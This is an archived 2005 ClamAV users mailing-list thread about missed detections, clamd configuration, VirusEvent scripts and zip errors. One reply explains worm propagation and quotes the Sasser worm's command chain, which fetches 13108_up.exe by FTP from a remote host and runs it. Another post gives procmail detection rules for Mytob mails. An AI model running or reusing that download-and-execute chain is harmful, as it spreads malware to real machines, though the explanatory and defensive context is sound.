Re: [Clamav-users] undetected malwares
--- Michel Arboi [EMAIL PROTECTED] wrote: http://passoire.hd.free.fr/malware/ All those malwares are not detected by ClamAV. They were automatically fetched by TFTP from infected machines when they tried to attack my IP. Hi Michel, How do those machines got infected in the first place and what do you mean by IP ? ip address ? What do you mean by attack here ? Do you mean that the infected machines try to tftp malwares to your machine ? I just try to understand how malwares spreaded ? Some files might be broken, as TFTP is not a very reliable protocol. I removed duplicated files and truncated files. Hope this help. ___ http://lurker.clamav.net/list/clamav-users.html __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] Can ClamAV detect this ?
Can the current ClamAV scan .eml and .nws file types ? http://www.malware.com/index2.html __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] Can ClamAV detect this ?
* Joanna Roman [EMAIL PROTECTED] [20050609 09:34]: wrote: Can the current ClamAV scan .eml and .nws file types ? http://www.malware.com/index2.html 5 years down the line, you still think Microsoft has not fixed those issues, correct? Tell us if you tested the outlined procedures and they work on your PC, which is running the latest service pack for its version??? Also, please remember that ClamAv is not a desktop mailware scanner by design. Also, I may be naive, but I don't categorise whatever is on that page as malware ;) -Wash http://www.netmeister.org/news/learn2quote.html -- +==+ |\ _,,,---,,_ | Odhiambo Washington[EMAIL PROTECTED] Zzz /,`.-'`'-. ;-;;,_ | Wananchi Online Ltd. www.wananchi.com |,4- ) )-,_. ,\ ( `'-'| Tel: +254 20 313985-9 +254 20 313922 '---''(_/--' `-'\_) | GSM: +254 722 743223 +254 733 744121 +==+ A rock pile ceases to be a rock pile the moment a single man contemplates it, bearing within him the image of a cathedral. -- Antoine de Saint-Exupery ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] Can ClamAV detect this ?
--- Odhiambo Washington [EMAIL PROTECTED] wrote: * Joanna Roman [EMAIL PROTECTED] [20050609 09:34]: wrote: Can the current ClamAV scan .eml and .nws file types ? http://www.malware.com/index2.html 5 years down the line, you still think Microsoft has not fixed those issues, correct? Tell us if you tested the outlined procedures and they work on your PC, which is running the latest service pack for its version??? Also, please remember that ClamAv is not a desktop mailware scanner by design. Also, I may be naive, but I don't categorise whatever is on that page as malware ;) -Wash http://www.netmeister.org/news/learn2quote.html -- +==+ |\ _,,,---,,_ | Odhiambo Washington [EMAIL PROTECTED] Zzz /,`.-'`'-. ;-;;,_ | Wananchi Online Ltd. www.wananchi.com |,4- ) )-,_. ,\ ( `'-'| Tel: +254 20 313985-9 +254 20 313922 '---''(_/--' `-'\_) | GSM: +254 722 743223 +254 733 744121 +==+ A rock pile ceases to be a rock pile the moment a single man contemplates it, bearing within him the image of a cathedral. -- Antoine de Saint-Exupery ___ http://lurker.clamav.net/list/clamav-users.html I am just asking in general. So do you know what malwares can ClamAV detect right now ? __ Discover Yahoo! Have fun online with music videos, cool games, IM and more. Check it out! http://discover.yahoo.com/online.html ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] Can ClamAV detect this ?
* Joanna Roman [EMAIL PROTECTED] [20050609 09:49]: wrote: [snip] I am just asking in general. So do you know what malwares can ClamAV detect right now ? Yes, I know. They are all in main.cvd and daily.cvd. If you want to find out which one, use: sigtool -l /usr/local/share/clamav/main.cvd | grep whatever.. sigtool -l /usr/local/share/clamav/daily.cvd | grep whatever.. yeah? -Wash http://www.netmeister.org/news/learn2quote.html -- +==+ |\ _,,,---,,_ | Odhiambo Washington[EMAIL PROTECTED] Zzz /,`.-'`'-. ;-;;,_ | Wananchi Online Ltd. www.wananchi.com |,4- ) )-,_. ,\ ( `'-'| Tel: +254 20 313985-9 +254 20 313922 '---''(_/--' `-'\_) | GSM: +254 722 743223 +254 733 744121 +==+ No man in the world has more courage than the man who can stop after eating one peanut. -- Channing Pollock ___ http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] Recent CVS - broken logging to /dev/stderr ?
Hi list, Is it just me, or has the recent CVS changes around the logg() function broken logging to /dev/stderr? It would appear that maybe privileges are being dropped too quickly because with today's cvs I'm getting permission denied on /dev/stderr with perms = rw--- root.root. It was fine (and still is) on cvs from a few days ago. Steve ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] Re: Worm.Mytob
Samuel Benzaquen wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of René Berber Sent: Wednesday, June 08, 2005 4:00 PM To: clamav-users@lists.clamav.net Subject: [Clamav-users] Re: Worm.Mytob Pavel R. Levashov wrote: I have a mail server (sendmail on RedHat 7.3) with clamav antivirus (clamd version 0.85.1, clamav-milter version 0.85). Clamd updates its antivirus bases regularly, clamav-milter catches all viruses except one: Worm.Mytob. This virus is transparent for clamav-milter. The surprise is that ClamWin 0.85.1 on Windows XP finds this virus at once. Could you give me a piece of advise what is the reason of such behavior? Below are pieces of log files on RedHat Linux 7.3 from freshclam.log: -- Received signal: wake up ClamAV update process started at Wed Jun 8 22:33:09 2005 main.cvd is up to date (version: 32, sigs: 34720, f-level: 5, builder: tkojm) daily.cvd is up to date (version: 921, sigs: 753, f-level: 5, builder: diego) -- Are you using clamav-milter with or without clamd? If you are using it with clamd then you should add (uncomment really) NotifyClamd in your freshclam.conf . This may only solve the problem if clamd has been running a long time but not refreshing the database (since freshclam is not telling it to do it). Nevertheless, clamd's SelfCheck would have reloaded the new database if it has been written to the right directory. You can check the running version sending the VERSION command to clamd's socket. You could be ommiting some option on clamd's conf. Is it with all Mytob sigs or some specific sigs ? -Samuel ___ http://lurker.clamav.net/list/clamav-users.html Thank you very much for your advice. The reason was in misconfiguration of the clamd daemon. Best wishes, Pavel Levashov ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] Recent CVS - broken logging to /dev/stderr ?
Steve Brown wrote: It would appear that maybe privileges are being dropped too quickly because with today's cvs I'm getting permission denied on /dev/stderr with perms = rw--- root.root. It was fine (and still is) on cvs from a few days ago. Unless I am very much mistaken, the perms on stderr should be 666. Matt ___ http://lurker.clamav.net/list/clamav-users.html
RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Samuel Benzaquen Sent: Wednesday, June 08, 2005 5:21 PM To: ClamAV users ML Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Scott Woodford Sent: Wednesday, June 08, 2005 3:55 PM To: 'ClamAV users ML' Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko Tim, not a problem. Been a long day for me too, so I know how ya feel. I'd love to just replace that code and use it, but that doesn't seem to work for me. All I want is a message box popping up, telling the user that a virus was found. I've even tried VirusEvent echo %v, which is a pretty simple, but that's not working either. I hate being a newbie. You could use xmessage to show a message in a window on X. For example: VirusEvent xmessage Virus found: %v I have not used xmessage for a long time, so you should read the man page for more customization. -Samuel ___ http://lurker.clamav.net/list/clamav-users.html Ok, thanks to everyone on this list, I have gotten almost everything up and running perfectly. I really appreciate all of your help. I still have two problems: 1 - I cannot get Dazuko to start automatically every time the computer boots in RedHat 9. 2 - xmessage works great for the VirusEvent, but I can't figure out how to use a newline character to get the text to wrap - Otherwise, I wrote a Perl script that displays the VirusEvent message just fine, but I have no idea how to pass %v to it Thanks again for everything. ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] Recent CVS - broken logging to /dev/stderr ?
On Thu, Jun 09, 2005 at 09:19:22AM +0100, Matt Fretwell said: Steve Brown wrote: It would appear that maybe privileges are being dropped too quickly because with today's cvs I'm getting permission denied on /dev/stderr with perms = rw--- root.root. It was fine (and still is) on cvs from a few days ago. Yes, that is the problem. This does however fix the problem of clamav opening all it's descriptors (including the logfile) as root, breaking permissions for anything else that needs to write to the logfile. Try starting it as the user it runs as, e.g., su -c /usr/sbin/clamd - clamav Probably the correct fix for this is to close all descriptors just before dropping priviledges, and then reopen them after. Unless I am very much mistaken, the perms on stderr should be 666. I doubt that - 0600 is much more reasonable. Why would you want your stderr stream (or root's) to be world writable? Some distros do use 640 $USER:tty, but I would be surprised if anybody sets it up as 666 by default. -- -- | Stephen Gran | Woman was God's second mistake. --| | [EMAIL PROTECTED] | Nietzsche | | http://www.lobefin.net/~steve | | -- pgpEu2i72RwWS.pgp Description: PGP signature ___ http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] VirusEvent in clamd.conf
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Scott Woodford Sent: Thursday, June 09, 2005 9:27 AM To: 'ClamAV users ML' Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Samuel Benzaquen Sent: Wednesday, June 08, 2005 5:21 PM To: ClamAV users ML Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Scott Woodford Sent: Wednesday, June 08, 2005 3:55 PM To: 'ClamAV users ML' Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko Tim, not a problem. Been a long day for me too, so I know how ya feel. I'd love to just replace that code and use it, but that doesn't seem to work for me. All I want is a message box popping up, telling the user that a virus was found. I've even tried VirusEvent echo %v, which is a pretty simple, but that's not working either. I hate being a newbie. You could use xmessage to show a message in a window on X. For example: VirusEvent xmessage Virus found: %v I have not used xmessage for a long time, so you should read the man page for more customization. -Samuel ___ http://lurker.clamav.net/list/clamav-users.html Ok, thanks to everyone on this list, I have gotten almost everything up and running perfectly. I really appreciate all of your help. I still have two problems: 1 - I cannot get Dazuko to start automatically every time the computer boots in RedHat 9. 2 - xmessage works great for the VirusEvent, but I can't figure out how to use a newline character to get the text to wrap - Otherwise, I wrote a Perl script that displays the VirusEvent message just fine, but I have no idea how to pass %v to it Thanks again for everything. ___ http://lurker.clamav.net/list/clamav-users.html Well, I got the VirusEvent problem figured out. I wrote a shell script that I call from VirusEvent, and it works great for the root account. Here it is: Title: virus_notify.sh Location: /usr/local/bin ** #!/bin/sh message=\nVIRUS '$1' FOUND !!! Access to this file / directory has been denied.\nYou must contact the Administrator immediately. A note of this virus has been\nmade in the system logs. if ! gdialog --title 'VIRUS FOUND !!!' --msgbox $message 10 10; then sleep 10 exit 1; fi ** I call it from the VirusEvent line in clamd.conf like this: VirusEvent /usr/local/bin/virus_notify.sh %v (without quotes obviously). The problem now is that this message only gets displayed when the root account finds a virus. If I log in as a regular user, then it just denies access to the file and gives an error, rather than showing me the virus notification message. I'm not sure if the variable AllowSupplementaryGroups in clamd.conf has anything to do with it, but either way I have enabled that. Any ideas? ___ http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] Mytob.dj (or some variant) apparently not detected by Clam
It appears the last round of mails sent by Mytob.dj (or a close variant) are not being detected in the current sigs (921). I'm going by the description here: http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED] As of last night I only had bounces for samples, and submitted one that was mostly a complete mail (missing just a initial Received: line and a Return-Path:. I added procmail rules based on that and now have complete samples, one of which I submitted a little while ago. I've attached the procmail rules I'm using to catch any that make it past Clam. == Chris Candreva -- [EMAIL PROTECTED] -- (914) 967-7816 WestNet Internet Services of Westchester http://www.westnet.com/ :0 B * 5000 * ^html +$body +$BRSTRONGDear Valued Member, /STRONGBR $VirusFolder :0 B * 5000 * ^BRa href=http://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/confirm.php?email= $VirusFolder ___ http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] How does ClamAV classify Worm and Trojan ?
When someone submit a virus sample (in the format of email, exe file, *.hml file), what criteria does ClamAV team use to classify the virus sample as Worm or Trojan ? - Discover Yahoo! Use Yahoo! to plan a weekend, have fun online more. Check it out! ___ http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] zip error
Hi people, Recently I upgrade clamav to versioon 0.85-1 but I have problems with zip with passord. Clamav log is /home/ricardo/BAK_SIQUEIRA_EADV_05-05-23.zip: Zip module failure ERROR, and I need to solve it. Any suggestions? The zip file is locate at http://200.161.4.170/zip Thanks Marcos ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] undetected malwares
On 6/9/05, Joanna Roman [EMAIL PROTECTED] wrote: What do you mean by attack here ? Do you mean that the infected machines try to tftp malwares to your machine ? I just try to understand how malwares spreaded ? there is several possibilities malware can hook your system - mail worms, the problem is infront of the computer, clicking instead of thinking. - browser exploits, the use a flaw in your webbrowser to execute a command and install malicious code - backdoors mails worms leave behind, as mydoom or bagle, you can connect them and upload code - remote exploitable vulnerbilities, you can get a command shell on the remote system, without any userinteraction, and download and execute code - others ( weak passwords on shares, britney_spears_nude.jpg.exe on kazaa ... ) to use remote exploitable vulnerbiltities, the viri have to 'scan' for vulnerable machines, meaning, they try to connect a machine on the port running the vulnerable service, and send the malicious packets (shellcode). there is several possibilities a shellcode can do, it can crash the machine, but that does not help the virus to spread, as he has to try to send a copy of himself to the victims machine. so the virus runs a little http, ftp oder tftp server, serving only himself. and he tells the victim to download itself by creating a windows command shell, he uses to download himself via tftp or ftp, as windows offers a tftp or ftp client per default. if the file is served via http, the shellcode has to make use of a winapi call like downloadurl() or something like that, as there is no commandline tool to download files via http on windows. example: this is used by the sasser virus, he opens a ftp server on port 5554 and asks the victims to download himself from this port. echo offecho open 123.45.67.89 5554cmd.ftpecho anonymouscmd.ftpecho userecho bincmd.ftpecho get 13108_up.execmd.ftpecho byecmd.ftpecho onftp -s:cmd.ftp13108_up.exeecho offdel cmd.ftpecho on this creates a file cmd.ftp with the content open 123.45.67.89 5554 anonymous bin get 13108_up.exe and runs the ftp.exe program with the file as input. ftp -s:cmd.ftp starts the downloaded file 13108_up.exe and deletes the file 'cmd.ftp' del cmd.ftp after successfull transmission, he starts the binary on the remote computer, the transferrd virus will install itself as a system service, create some registry keys, and scan for other vulnerable machines. often viri can exploit more than one weakness, to increase their chance. to defend yourself ... patch your system, run a firewall (even better, run a router), run an av scanner, think before clicking ___ http://lurker.clamav.net/list/clamav-users.html
Re: [Clamav-users] zip error
Hi, On vendredi 10 Juin 2005 05:09, Marcos Dutra wrote: Recently I upgrade clamav to versioon 0.85-1 but I have problems with zip with passord. Clamav log is /home/ricardo/BAK_SIQUEIRA_EADV_05-05-23.zip: Zip module failure ERROR, and I need to solve it. Any suggestions? The zip file is locate at http://200.161.4.170/zip AES encrypted ZIP files use a method compression id that is not recognized by ClamAV 0.85.1. This is a known problem and it has already been fixed in CVS. Regards, David Majorel ___ http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] ClamAV integration notes
hi i'm currently analyzing integration of ClamAV into a sort of content management system that we have. among other things users can upload and download files to it so there's a need to do virus scanning on the files. my initial idea is to run virus scan for each file upload and then do periodic scanning for all files perhaps once a month so that files containing viruses which aren't known to ClamAV at upload time are also caught at some point. i'm planning on running the clamd in the background and using the TCP socket based API to command clamd to do the scanning. i've been exprimenting a little with the integration with ClamAV v0.85.1 and here're some questions and comments: - with the TCP API clamd closes the socket when it finishes. how do i determine whether the clamd scan was successfully finished or that the server has died unexpectedly during the scan? - the TCP API doesn't seem to provide the same level of parameterization. it would be nice to be able to use some of the clamscan parameters such as --exclude, --include etc. with the API. - the TCP API only seems to report FOUND or ERROR as return status for each file. it would be good to also give the full return code per file similar as with clamscan. - what does clamd report if a file is not scanned due to a clamd config option such as ArchiveMaxFileSize, ArchiveMaxRecursion, ArchiveMaxFiles or MaxDirectoryRecursion? does clamd report the decision to skip files or directories in some way? br. aspa ___ http://lurker.clamav.net/list/clamav-users.html